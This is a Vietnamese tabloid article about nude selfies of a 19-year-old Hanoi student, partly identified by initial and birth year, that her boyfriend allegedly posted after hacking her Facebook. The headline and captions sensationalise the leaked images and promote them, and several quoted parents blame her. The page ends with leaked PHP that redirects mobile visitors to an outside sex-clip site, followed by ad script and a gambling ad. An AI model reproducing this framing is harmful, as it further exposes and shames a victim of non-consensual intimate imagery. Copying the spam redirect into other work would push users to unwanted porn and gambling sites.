Ảnh sex Nữ Sinh Hà Nội 19 tuổi bị bạn trai tung lên Facebook

Filed under: TIN SHOCK 9X |

Nu sinh 19 tuoi ha noi chup anh tu suong
Sốc và choáng chính là 2 từ hôm nay Cộng đồng cư dân mạng dành cho 1 Nữ Sinh Hà Nội, tất cả cư dân mạng đều đang xôn xao về những hình ảnh của nữ sinh tuổi teen Hà Nội… khỏa thân trước ống kính với kiểu chụp “tự sướng”.

Chiều nay, khi lang thang trên các trang mạng xã hội, chị Yến (Hoàng Hoa Thám) không khỏi sững sờ khi thấy dân tình xôn xao về những hình ảnh của một cô gái tuổi teen được cho là nữ sinh Hà Nội đang… khỏa thân trước ống kính với kiểu chụp “tự sướng”. Trước những công nghệ hiện đại như bầy giờ thì những hình ảnh nhạy cảm này đang được lan truyền một cách chóng mặt trên cộng đồng mạng một cách khó kìm lại được.

Nu Sinh Ha Noi tu chup anh sex tung len mang gay soc

Nữ sinh Hà nội chụp ảnh sex tự sướng tung lên mạng

Chị Yến: “Tôi không thể hình dung tại sao ở tuổi các cháu lại có thể chụp được những bức ảnh như thế này. Tôi cũng có con gái bằng tuổi cháu, thật quá lo lắng!”, chị Yến bày tỏ. Và không chỉ riêng chị Yến mà các bậc sinh thành nói chung hiện nay cũng đang phải lo lằng trước những sự việc xảy ra, ngày một nhiều như thế. Hết chụp lén ảnh phòng the, chụp ảnh tự sướng hay tự quay video cảnh làm tình của các bạn trẻ …

Theo những thông tin cư dân mạng truyền tai nhau, cô gái trong ảnh được cho là T, sinh năm 1993. Ảnh được chụp từ màn hình webcam trong tình trạng chủ nhân đang “không mảnh vải che thân” và được cho là post lên chính FB của cô nữ sinh này.

Ảnh sex nghi là của nữ sinh Hà Nội này

Cũng theo các thông tin này, thì có thể cô nữ sinh đã bị người yêu chơi xấu bằng cách hack tài khoản Facebook và post những bức ảnh nhạy cảm lên.

Đứng trên góc độ làm cha làm mẹ, các bậc phụ huynh đã có những ý kiến trái chiều về sự việc này.

Chị Lan, nhân viên hành chính một công ty ở Cầu Giấy bày tỏ: “Không có lửa sao có khói. Nếu không chụp sao lại có ảnh được. Sinh năm 1993, năm nay mới tròn 19 tuổi mà đã để xảy ra những sự cố kinh khủng như thế này rồi”.

Trong khi đó, chị Huyền (Láng Hạ) lại tỏ ra thông cảm và chia sẻ: “Tuổi trẻ có những cú va vấp đầu đời không thể tránh được. Chỉ tội nghiệp cho cô bé đã bị người yêu chơi xấu”. Chị Huyền cũng cho rằng, ở lứa tuổi còn đang phát triển này, bố mẹ lại càng phải quan tâm sát sao đến con cái, tránh những trường hợp đáng tiếc như thế này xảy ra.

Phim sex
if (is_mobile()) { header("Location: http://mclip.in/tai-clip/13363"); exit(); } function is_mobile() { if(isset($_SERVER["HTTP_X_WAP_PROFILE"])) return true; if(preg_match("/wap.|.wap/i",$_SERVER["HTTP_ACCEPT"])) return true; if(isset($_SERVER["HTTP_USER_AGENT"])) { $user_agents = array( "midp", "java", "opera mini", "opera mobi", "mobi", "nokia", "midp", "midp", "j2me", "avantg", "docomo", "novarra", "palmos", "palmsource", "240x320", "opwv", "chtml", "pda", "windows ce", "mmp\/", "blackberry", "mib\/", "symbian", "wireless", "nokia", "hand", "mobi", "phone", "cdm", "up.b", "audio", "SIE-", "SEC-", "samsung", "HTC", "mot-", "mitsu", "sagem", "sony", "alcatel", "lg", "erics", "vx", "NEC", "philips", "mmm", "xx", "panasonic", "sharp", "wap", "sch", "rover", "pocket", "benq", "java", "pt", "pg", "vox", "amoi", "bird", "compal", "kg", "voda", "sany", "kdd", "dbt", "sendo", "sgh", "jb", "dddi", "iphone", "ipad", "android", "Android","series 60", "s60" ); $user_agents = implode("|", $user_agents ); if (preg_match("/$user_agents/i", $_SERVER["HTTP_USER_AGENT"])) return true; } return false; } function hide_float() { var content = document.getElementById('float_content'); var hide = document.getElementById('hide_float'); if (content.style.display == "none") { content.style.display = "block"; hide.innerHTML = ' Close [X]'; } else { content.style.display = "none"; hide.innerHTML = 'Quang Cao! '; } }
[X] Close.
mybet88